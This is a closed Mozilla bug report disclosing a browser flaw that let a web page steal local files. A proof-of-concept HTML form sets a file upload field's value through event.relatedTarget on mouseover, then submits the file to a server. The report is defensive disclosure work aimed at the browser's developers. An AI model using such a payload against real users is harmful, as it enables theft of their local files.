Closed Bug 164687 Opened 23 years ago Closed 23 years ago

Uploading arbitrary files using event.relatedTarget

Categories

(Core :: DOM: Core & HTML, defect)

x86
Windows 2000
defect
Not set
normal

Tracking

()

VERIFIED DUPLICATE of bug 164023

People

(Reporter: security-bugs, Assigned: alexsavulov)

Details

It is possible to steal local files with the file upload control. This is somewhat related to bug 163598 but the trick is done with event.relatedTarget. The following reads a local file and sends it to a remote server.

-----------------------------------
<html>
Written by <a href="http://www.guninski.com">Georgi Guninski</a>
<br>
<form action="http://localhost/cgi-bin/x.pl" enctype="multipart/form-data" method="POST">
Mouse over this:
<input type=file name=c onmouseover='event.relatedTarget.value="/var/www/html/index.html"'><br>
<input type=submit>
</form>
</html>
-----------------------------------

Due to the increased number of file upload attacks, I suggest adding a warning whenever a file is being uploaded.

Georgi Guninski
*** This bug has been marked as a duplicate of 164023 ***
Status: NEW → RESOLVED
Closed: 23 years ago
Resolution: --- → DUPLICATE
Trusting John on this, verifying
Status: RESOLVED → VERIFIED
Group: security
Component: HTML: Form Submission → DOM: Core & HTML